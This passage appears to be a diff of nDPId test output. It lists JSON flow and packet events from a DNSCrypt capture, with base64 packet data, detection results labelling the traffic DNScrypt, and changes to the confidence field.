AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":59224,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":59224,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":41895,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAIclaZAAL0RCvoKAAABjgTMb6OnAbsCCB1KEX0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":41895,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":41895,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":443,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739348805} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":443,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAABQlaUAub0RTA4KAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAIcladAAL0RCvkKAAABjgTMb7UbAbsCCB1KEXsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46363,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46363,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":57180,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAXclaggAL0RJzgKAAABjgTMb99cAbsGBKBJEX4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":57180,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":57180,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":446,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739348805} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":446,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAABQlagAub0RTAsKAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":47621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAXclakgAL0RJzcKAAABjgTMb7oFAbsGBMWkEXoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":47621,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":47621,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":448,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739348805} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":448,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAABQlakAub0RTAoKAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":946739348912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739348912,"pkt":"ZmZmZmZmRERERERECABFAADWoIMAADQRymOOBMxvCgAAAQG7o6cAwiYzEX2BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"} @@ -910,26 +910,26 @@ 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":2,"flow_last_seen":946739348917,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739348917,"pkt":"ZmZmZmZmRERERERECABFAADWoIgAADQRyl6OBMxvCgAAAQG7ugUAwg\/YEXqBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":455,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":38371,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 